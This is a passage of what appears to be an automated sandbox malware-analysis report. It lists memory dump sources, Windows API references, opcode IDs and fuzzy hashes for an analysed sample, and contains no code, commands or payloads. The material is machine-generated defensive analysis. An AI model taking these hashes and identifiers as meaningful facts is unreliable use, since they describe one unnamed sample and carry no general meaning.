                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 360BB971
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                  • Opcode ID: 7ed2dd9da48b7b786d536d3a0ebb1701344acb1d2abe9628ce37e97630586145
                                                                                                                                                  • Instruction ID: 66e25ddfc70c559ef949dd2d32ec846a230c94b89422be5b791e9b48b1c42240
                                                                                                                                                  • Opcode Fuzzy Hash: 7ed2dd9da48b7b786d536d3a0ebb1701344acb1d2abe9628ce37e97630586145
                                                                                                                                                  • Instruction Fuzzy Hash: B65156B0900609CFDB04CFAAC945BDEBBF2EF88300F248499D519A7360DB759941CB66
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 82ed01d721660067c1bc2bfca32a29e6d2b8572fca5793342605fda908fbad49
                                                                                                                                                  • Instruction ID: 742963a06387638aec4bf3c896548b27fa7168a0ad42a1605c30e2a364824991
                                                                                                                                                  • Opcode Fuzzy Hash: 82ed01d721660067c1bc2bfca32a29e6d2b8572fca5793342605fda908fbad49
                                                                                                                                                  • Instruction Fuzzy Hash: 43F13A74E00209CFEB04DFA9C848B9DBBF2BF88708F958159D505AF265DB74A985CF81
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 367269C2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                  • Opcode ID: aa11f6fbaa11b532b4e6b56c983841f2a47fb0ba90f51e477b675141486c1d14
                                                                                                                                                  • Instruction ID: 9552ba91a231d0f07831fdeecfa50d0c024dd342939aa4e5e157d14632421ab9
                                                                                                                                                  • Opcode Fuzzy Hash: aa11f6fbaa11b532b4e6b56c983841f2a47fb0ba90f51e477b675141486c1d14
                                                                                                                                                  • Instruction Fuzzy Hash: FE51E0B5C10359DFDB14CFAAD980ADEBFB2BF48310F64812AE818AB210D7749851CF90
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 367269C2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                  • Opcode ID: 721a6d7aff3af2cd7d1913a8e885069c5c8a0370106be21c95d7c14440a390ac
                                                                                                                                                  • Instruction ID: 5011f6c5f4ac97851ff26f0b209b81ecdf7a0d59a4c7f2808c3f49f999455457
                                                                                                                                                  • Opcode Fuzzy Hash: 721a6d7aff3af2cd7d1913a8e885069c5c8a0370106be21c95d7c14440a390ac
                                                                                                                                                  • Instruction Fuzzy Hash: 0A41D0B5D10359DFDB14CFAAC880ADEBBB5BF48310F64812AE818AB210D7749851CF90
                                                                                                                                                  APIs
                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 36728F31
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                                  • Opcode ID: 476140fffd8deaf5a15cada4a8ddde84a1d5462da993779b815d767173e42ed3
                                                                                                                                                  • Instruction ID: ea010732560f15ac25fd12af921487e8776c90b74819cae2286ee1af4dc1b6a2
                                                                                                                                                  • Opcode Fuzzy Hash: 476140fffd8deaf5a15cada4a8ddde84a1d5462da993779b815d767173e42ed3
                                                                                                                                                  • Instruction Fuzzy Hash: 4A4119B8900305DFDB04CF99C844AAABBF6FB88314F24C459E518AB321D775A845CFA1
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 360BBAEF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: cb12104d1c510b92490f98f705fc271ddb489efdd397db4be05b7b576737caf0
                                                                                                                                                  • Instruction ID: 98b64c36ee5a814e3110fe431e2649107525cffb37ba563974ec8dfd6a350347
                                                                                                                                                  • Opcode Fuzzy Hash: cb12104d1c510b92490f98f705fc271ddb489efdd397db4be05b7b576737caf0
                                                                                                                                                  • Instruction Fuzzy Hash: 8321E5B5900248EFDB10CFAAD985ADEFFF4EB48320F14845AE958A3310D774A940CFA5
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 360BBAEF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: 236003cc1cb4dd9e3c5d4af776df1f3edbfafde62a92f73f22a26c8fa675decd
                                                                                                                                                  • Instruction ID: 723de6995c86a7ff633eef2de82a006f8e3ef01e41daebbe29da3b1512109eac
                                                                                                                                                  • Opcode Fuzzy Hash: 236003cc1cb4dd9e3c5d4af776df1f3edbfafde62a92f73f22a26c8fa675decd
                                                                                                                                                  • Instruction Fuzzy Hash: 0221C4B5D00248EFDB10CFAAD984ADEBFF4EB48320F14845AE954A7310D374A940CFA5
                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 3672B40D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Initialize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                  • Opcode ID: 0f512373130b596935981a62cf28eee290f3b23693ddb93bbf37c1c2250a55ce
                                                                                                                                                  • Instruction ID: ea68add520a1a5445346911b686432519ae0cfca62555029060ae7aea1afe061
                                                                                                                                                  • Opcode Fuzzy Hash: 0f512373130b596935981a62cf28eee290f3b23693ddb93bbf37c1c2250a55ce
                                                                                                                                                  • Instruction Fuzzy Hash: DE1163B5800348DFCB10CFAAD588BDEBBF4EB48724F10841AD518AB300C334A541CFA6
                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 3672B40D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978862220.0000000036720000.00000040.00000800.00020000.00000000.sdmp, Offset: 36720000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_36720000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Initialize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                  • Opcode ID: dab62989f4ca8a2fb3d2bda253baca43c7f725f847137ae6a7eadc836a4e30c9
                                                                                                                                                  • Instruction ID: 9da9388305bbf84ed500e8e5515904095bcd59f95312798fa3fe06e597e5baa5
                                                                                                                                                  • Opcode Fuzzy Hash: dab62989f4ca8a2fb3d2bda253baca43c7f725f847137ae6a7eadc836a4e30c9
                                                                                                                                                  • Instruction Fuzzy Hash: EB11E5B5900748DFDB10DFAAD444B9EBBF4EB48724F14845AD558A7300D378A944CFA5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: d60778e87bf42ef5fca7f029837ee30c9826d064ed0773b2b6dbb7c968dc8ec7
                                                                                                                                                  • Instruction ID: f93eb23a83f8155dfcc5c67043a0f68e02e869d5a937073a723f37647ce97778
                                                                                                                                                  • Opcode Fuzzy Hash: d60778e87bf42ef5fca7f029837ee30c9826d064ed0773b2b6dbb7c968dc8ec7
                                                                                                                                                  • Instruction Fuzzy Hash: 1D8105707006009BEB556F78C85936D37A2AFC5360FA08629F8569B7E1CF358D81CB52
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2
                                                                                                                                                  • API String ID: 0-3503038589
                                                                                                                                                  • Opcode ID: 85af9a18ecf9875c689385523aa1edf1413c270d2dc4b32e1c7be4ced179c68f
                                                                                                                                                  • Instruction ID: e159f6316329dd01ff66419b6ccf131911f93637d04e5e7be36e25171ab42a71
                                                                                                                                                  • Opcode Fuzzy Hash: 85af9a18ecf9875c689385523aa1edf1413c270d2dc4b32e1c7be4ced179c68f
                                                                                                                                                  • Instruction Fuzzy Hash: 9741DDB8E15208CFDB04DFA4D994AEDBBF1FB89300F60852AD415B72A0DB345A46CF54
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2
                                                                                                                                                  • API String ID: 0-3503038589
                                                                                                                                                  • Opcode ID: 946bcbf4b4c1fbba5c7787b20fc3a935e7020c73e10ca5fa9cf005ee8ba75107
                                                                                                                                                  • Instruction ID: 679280f36775a73a4077ec0d9a43e2d4eefb600e9114e4a1383e548e454fc136
                                                                                                                                                  • Opcode Fuzzy Hash: 946bcbf4b4c1fbba5c7787b20fc3a935e7020c73e10ca5fa9cf005ee8ba75107
                                                                                                                                                  • Instruction Fuzzy Hash: 4741BDB8E15208CFDB04DFA5D9946EDBBF2FB89300F60842AD415B72A4EB345A46CF54
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2473825adb5f9286b9c76b051edc21e458d3d5f9a60fa8cd897d024d6dfc5632
                                                                                                                                                  • Instruction ID: a5896d19d694eeccb9a9247cb4962077254e3c14ac47b3b2daf94d059e10e6d1
                                                                                                                                                  • Opcode Fuzzy Hash: 2473825adb5f9286b9c76b051edc21e458d3d5f9a60fa8cd897d024d6dfc5632
                                                                                                                                                  • Instruction Fuzzy Hash: 5371CD75E01208CFEB08DFA9C890AADBBB2FF89300F608129D815BB355DB355942CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 83666a9b42a4a071a696287d1747f23f68341bf2b91187f34d2d70d1e28323bf
                                                                                                                                                  • Instruction ID: d6c0184bb7222d6e36bb35bd67149d05b766c2b332fde91763d8b30ddabdae10
                                                                                                                                                  • Opcode Fuzzy Hash: 83666a9b42a4a071a696287d1747f23f68341bf2b91187f34d2d70d1e28323bf
                                                                                                                                                  • Instruction Fuzzy Hash: 4B611074D00218CFDB14DFA9D854BEDBBB2BF89301F608129D805AB3A4DB395A86CF40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a37944c7ac8facc4d71028a1cf17422bf9ce3e88a4b0d6609a28bd99cda65afc
                                                                                                                                                  • Instruction ID: d6a88ca711181ef268ef1bdf19828647a61f88cbff81d1d49827e466204e6274
                                                                                                                                                  • Opcode Fuzzy Hash: a37944c7ac8facc4d71028a1cf17422bf9ce3e88a4b0d6609a28bd99cda65afc
                                                                                                                                                  • Instruction Fuzzy Hash: CE519374E01218DFDB48DFA9D98499DBBF2FF89300F248169E819AB365DB30A905CF10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5e1e5eb7aaf48da706b3a678374f81e77cc5b8c0663f1dae7879db1e427b8b28
                                                                                                                                                  • Instruction ID: b78fe9e44cd39664fd4f04c2d12030dd014eb14ccfe799e156769a20d5912b37
                                                                                                                                                  • Opcode Fuzzy Hash: 5e1e5eb7aaf48da706b3a678374f81e77cc5b8c0663f1dae7879db1e427b8b28
                                                                                                                                                  • Instruction Fuzzy Hash: 8F519F75E01208CFCB48DFA9D99499DBBF2FF89311B609069E815BB324DB35A846CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2f7bf53cbd2a9eaf6a3f832ae7670ec97f5a20428a47aedfbfa9f3c7cd11de34
                                                                                                                                                  • Instruction ID: 369f69cd03fcc15a8419d394844b1d1e10431503bbff1faf327e7fdc274f0df7
                                                                                                                                                  • Opcode Fuzzy Hash: 2f7bf53cbd2a9eaf6a3f832ae7670ec97f5a20428a47aedfbfa9f3c7cd11de34
                                                                                                                                                  • Instruction Fuzzy Hash: F9419E31A40249DFCF15DFA4C844ADDBFB2EF49312F408255E825AF661D371E958CBA2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3b7f0895dd839b92cdfb35611b82086af0b19ccc6caab4bfad5445d51b8b0888
                                                                                                                                                  • Instruction ID: 25bf6be234c7f97cfc8244178caffe9db1b71ef898b24b440396aff69ac5f6ae
                                                                                                                                                  • Opcode Fuzzy Hash: 3b7f0895dd839b92cdfb35611b82086af0b19ccc6caab4bfad5445d51b8b0888
                                                                                                                                                  • Instruction Fuzzy Hash: F741253290D3858FCB169F34C8656993F71EF56301B4500AAE864CF293CB389D5EC7A2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bfca46b19134c058c889a20e4aa10a54ca948cf582882ff1ed04cd746cc7f84c
                                                                                                                                                  • Instruction ID: e78d2bba929587e2af3fa4790a3b7b198421d2ba00dd60aa4a1a0781bd6fadde
                                                                                                                                                  • Opcode Fuzzy Hash: bfca46b19134c058c889a20e4aa10a54ca948cf582882ff1ed04cd746cc7f84c
                                                                                                                                                  • Instruction Fuzzy Hash: 3731A730308241CFDB298BB5D89467D7BA5EF85706B25049ED8B6CF291DB25CC88C753
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 42c52f57fc582694641da21f38c0b49fe050d2ed6b2f616430b68839c23e1e93
                                                                                                                                                  • Instruction ID: 33c6e5422a34113d5537c4537ed8aff6c21725eb8c8feb109d9b488041e6570b
                                                                                                                                                  • Opcode Fuzzy Hash: 42c52f57fc582694641da21f38c0b49fe050d2ed6b2f616430b68839c23e1e93
                                                                                                                                                  • Instruction Fuzzy Hash: B541E2317082449FCB199BA4D854BAE7BF6AFC8711F144069E91AEB791CF308D85CBA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5ede06c126bbd9692904fd4ecfb1401cb84ae40ff97a7a418c3170efa3e59981
                                                                                                                                                  • Instruction ID: 526abb0251574d17e57fdeffca955301a729e4d0038dd367037530aafd73fe2e
                                                                                                                                                  • Opcode Fuzzy Hash: 5ede06c126bbd9692904fd4ecfb1401cb84ae40ff97a7a418c3170efa3e59981
                                                                                                                                                  • Instruction Fuzzy Hash: 6A41FF31604348DFCB158F64D806B6EBBF2EF45301F0480AAE8259B6A2D7789D49CBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0c89d583fc4e6e6de63d22d24127f536dc984a7ba18764dbb783585111444249
                                                                                                                                                  • Instruction ID: 62901e497fc1216d25a34f17e45bad1218e757463c40392fb364c7f2cf644bc2
                                                                                                                                                  • Opcode Fuzzy Hash: 0c89d583fc4e6e6de63d22d24127f536dc984a7ba18764dbb783585111444249
                                                                                                                                                  • Instruction Fuzzy Hash: 8C31F571B042449FCB05EBB8D855AAE7BB6EFC9301F1480BAE509DB352DE318D42DB60
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 187fc7fa83343320f51b8635de543c07837991b8c25e103b4d8e44676b63e741
                                                                                                                                                  • Instruction ID: 978a3957d536981e0337dcd3504e98a4cd8e72690e2cae782f622739996966a7
                                                                                                                                                  • Opcode Fuzzy Hash: 187fc7fa83343320f51b8635de543c07837991b8c25e103b4d8e44676b63e741
                                                                                                                                                  • Instruction Fuzzy Hash: 48317BBEA082928FD715D768D880D2EBB72BF412443164D66E958EF2A1DB30DC43C7D6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4309c892d152cc4cf1bd7cecf9647841446b66fdc7e092b96fcfe0cad2b6d04d
                                                                                                                                                  • Instruction ID: 1a819c7fcf913d837518b7e8a23c0316990b49c1a1f09337eb7a2cb43e0b4ca7
                                                                                                                                                  • Opcode Fuzzy Hash: 4309c892d152cc4cf1bd7cecf9647841446b66fdc7e092b96fcfe0cad2b6d04d
                                                                                                                                                  • Instruction Fuzzy Hash: 38312475B002088FDB44DBA8D490EDDBBB2BF88220F195590E901AB361DF71EC85CBA1
                                                                                                                                                  Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 792edf10631e50ecde10eb12a294e222e463adb562a3a90ed92a4d7c8296e6e8
• Instruction ID: 918601c787cd4953f190a55730e7d56544ab3dca011d494526a393c35504466e
• Opcode Fuzzy Hash: 792edf10631e50ecde10eb12a294e222e463adb562a3a90ed92a4d7c8296e6e8
• Instruction Fuzzy Hash: 2931B231204109EFCF059F64D8956AE7BB2EB88301F508025FD299B395CB35DDA5DBE0

Memory Dump Source
• Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_32d40000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 677f745f48b09269009b0adf2140395a552829e69bc92b48abbbeb119c33b40a
• Instruction ID: 6f071ad9dfe2edd7cfc14a4214c6d93ab0a4a0d45523d4c263095daf64fe3f67
• Opcode Fuzzy Hash: 677f745f48b09269009b0adf2140395a552829e69bc92b48abbbeb119c33b40a
• Instruction Fuzzy Hash: B5313675B002088FDB44DBA8D490EDDBBB2BF88220F155194E901AF361DF71EC85CB91

Memory Dump Source
• Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_32d40000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cf9d7316fada9fa102b6881f32bb3d2e7ee577855587091e9fcfe1f8a13b0235
• Instruction ID: 6fdc646a5f398d14185e0a6637ea157bc3f21bfe7c5468aed59d0931a6c0fb73
• Opcode Fuzzy Hash: cf9d7316fada9fa102b6881f32bb3d2e7ee577855587091e9fcfe1f8a13b0235
• Instruction Fuzzy Hash: B03105306042859FD706AB78C824B9EBFB6EFC6310F5880A9D4458B3A2CF314D86CB91

Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08d67b2f79bba8aa9dfb803af6a88a73a9172944bdac8aa657a830064647368c
• Instruction ID: c11ab53c290bd84a5909892fc524ed2bda09a8892017941a3be1913beeb998ae
• Opcode Fuzzy Hash: 08d67b2f79bba8aa9dfb803af6a88a73a9172944bdac8aa657a830064647368c
• Instruction Fuzzy Hash: FD316F70A04515CFCB18CF68C8C89AEBBB3BF84351B158259E925DB3A5CB75EC46CB90

Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ba168b2f1b006dc6f364828618b1663531f43246468fb94886741e849f4d91b7
• Instruction ID: 3e0b897bb29dc35e66a8cffb893309bb9c0377fad80854a5c205a3a93e727dd3
• Opcode Fuzzy Hash: ba168b2f1b006dc6f364828618b1663531f43246468fb94886741e849f4d91b7
• Instruction Fuzzy Hash: A121B330300210CBDB15572A985567E31B7EFD4B5AF644039D926EF394EF76CC86A380

Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3f007a6802b3b558ff6b394c95ecbf99929e828fcfd33bda92cba83334194423
• Instruction ID: 38ce7a5495673d369b1d4220fadcc39d4363010498422420a19c41a83dc3a819
• Opcode Fuzzy Hash: 3f007a6802b3b558ff6b394c95ecbf99929e828fcfd33bda92cba83334194423
• Instruction Fuzzy Hash: 0E218E36704110CFC714DB2DD894A6AB3E6EF88711B1941AAE919CB371DB71DC06CB90

Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e496400ba991d94f4a2831abda3d529f7149afa17b5d2706895e32e7e59f644b
• Instruction ID: dce4dc98eb04c30be363155249375e616eee48c8a7b8150cf7c9376f3cb1d602
• Opcode Fuzzy Hash: e496400ba991d94f4a2831abda3d529f7149afa17b5d2706895e32e7e59f644b
• Instruction Fuzzy Hash: AA213231305651CFC7268B64C86466A7BB2AF86312359486ED85ACF7A5CF30DC06CBD0

Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e563f9ead065ffa38a048e7ddf90d0b59780ac158b0f4594fe8f598ed083943
